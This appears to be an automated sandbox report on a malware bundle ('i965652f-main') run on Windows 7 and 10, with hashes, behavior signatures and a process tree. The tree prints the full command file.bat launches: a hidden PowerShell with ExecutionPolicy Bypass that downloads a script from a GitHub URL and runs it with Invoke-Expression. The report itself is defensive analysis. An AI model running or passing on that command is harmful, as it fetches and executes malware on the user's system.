Overview
overview
10Static
static
10i965652f-m...ta.exe
windows7-x64
1i965652f-m...ta.exe
windows10-2004-x64
7i965652f-main/e.ps1
windows7-x64
3i965652f-main/e.ps1
windows10-2004-x64
3i965652f-m...de.ps1
windows7-x64
3i965652f-m...de.ps1
windows10-2004-x64
8i965652f-m...le.bat
windows7-x64
8i965652f-m...le.bat
windows10-2004-x64
8i965652f-m...ab.ps1
windows7-x64
3i965652f-m...ab.ps1
windows10-2004-x64
8i965652f-main/m.ps1
windows7-x64
8i965652f-main/m.ps1
windows10-2004-x64
8i965652f-m...st.vbs
windows7-x64
3i965652f-m...st.vbs
windows10-2004-x64
8Analysis
-
max time kernel
119s -
max time network
120s -
platform
windows7_x64 -
resource
win7-20240903-en -
resource tags
arch:x64arch:x86image:win7-20240903-enlocale:en-usos:windows7-x64system -
submitted
17-01-2025 06:15
Behavioral task
behavioral1
Sample
i965652f-main/bdata.exe
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
i965652f-main/bdata.exe
Resource
win10v2004-20241007-en
Behavioral task
behavioral3
Sample
i965652f-main/e.ps1
Resource
win7-20240729-en
Behavioral task
behavioral4
Sample
i965652f-main/e.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral5
Sample
i965652f-main/exclude.ps1
Resource
win7-20240903-en
Behavioral task
behavioral6
Sample
i965652f-main/exclude.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral7
Sample
i965652f-main/file.bat
Resource
win7-20240903-en
Behavioral task
behavioral8
Sample
i965652f-main/file.bat
Resource
win10v2004-20241007-en
Behavioral task
behavioral9
Sample
i965652f-main/grab.ps1
Resource
win7-20240903-en
Behavioral task
behavioral10
Sample
i965652f-main/grab.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral11
Sample
i965652f-main/m.ps1
Resource
win7-20240708-en
Behavioral task
behavioral12
Sample
i965652f-main/m.ps1
Resource
win10v2004-20241007-en
Behavioral task
behavioral13
Sample
i965652f-main/svhost.vbs
Resource
win7-20240903-en
Behavioral task
behavioral14
Sample
i965652f-main/svhost.vbs
Resource
win10v2004-20241007-en
General
-
Target
i965652f-main/file.bat
-
Size
302B
-
MD5
ddc61d23e574068d2b66d21a7129ff2b
-
SHA1
769713e5a4aea0f754f0dbc29bb5d6968a2c7e7c
-
SHA256
c14eab4fb063ffca030c1e60b5f57b67e668af453a0281515845c79e5ba98561
-
SHA512
d1bdb7fdc9d704758f29a2bcbe3568a085f9a95efeede529191c671dd30a255d95c960218e8064f7769b7865440fda741ecf235999cd0bb684571fef288f6f56
Malware Config
Signatures
-
Command and Scripting Interpreter: PowerShell 1 TTPs 2 IoCs
Run Powershell and hide display window.
pid Process 2308 powershell.exe 2308 powershell.exe -
Suspicious behavior: EnumeratesProcesses 1 IoCs
pid Process 2308 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2308 powershell.exe -
Suspicious use of WriteProcessMemory 3 IoCs
description pid Process procid_target PID 2996 wrote to memory of 2308 2996 cmd.exe 31 PID 2996 wrote to memory of 2308 2996 cmd.exe 31 PID 2996 wrote to memory of 2308 2996 cmd.exe 31
Processes
-
C:\Windows\system32\cmd.execmd /c "C:\Users\Admin\AppData\Local\Temp\i965652f-main\file.bat"1⤵
- Suspicious use of WriteProcessMemory
PID:2996 -
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell.exe -NoProfile -ExecutionPolicy Bypass -WindowStyle Hidden -Command "Invoke-Expression (Invoke-WebRequest -Uri 'https://raw.githubusercontent.com/k53xupn43/i965652f/refs/heads/main/m.ps1').Content"2⤵
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2308
-